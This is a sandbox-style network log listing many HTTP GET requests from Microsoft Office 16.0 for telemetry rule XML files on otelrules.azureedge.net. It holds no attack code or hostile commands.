Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
